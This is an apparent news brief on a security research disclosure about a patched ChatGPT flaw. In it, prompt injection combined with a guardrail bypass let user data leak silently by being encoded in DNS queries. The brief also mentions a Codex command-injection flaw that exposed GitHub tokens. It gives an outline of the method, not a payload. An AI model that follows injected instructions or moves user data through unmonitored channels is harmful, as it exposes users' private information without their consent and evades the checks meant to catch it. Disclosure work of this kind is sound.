Home / Technology / ChatGPT Flaw: Data Stolen Via DNS Abuse
ChatGPT Flaw: Data Stolen Via DNS Abuse
31 Mar
Summary
- A ChatGPT flaw enabled silent data theft using DNS abuse.
- Attackers bypassed ChatGPT guardrails to exfiltrate user data.
- OpenAI patched the vulnerability on February 20, 2026.

Security researchers have identified a critical vulnerability within ChatGPT that permitted the covert exfiltration of sensitive user data. This flaw, uncovered by Check Point Research, ingeniously combined prompt injection techniques with a bypass of the AI's inherent guardrails. The method leveraged DNS abuse, a method not typically flagged as risky, to encode information within domain queries.
This approach created a significant blind spot, as ChatGPT's standard security protocols did not recognize DNS activity as a data-sharing risk. Consequently, user data could be extracted without triggering alerts or requiring consent. OpenAI swiftly addressed this critical security concern, deploying a comprehensive patch on February 20, 2026.
This incident follows another significant vulnerability addressed by OpenAI earlier in the week, which affected ChatGPT Codex. That flaw involved command injection, enabling the theft of sensitive GitHub authentication tokens. Both discoveries underscore the evolving security landscape surrounding advanced AI tools.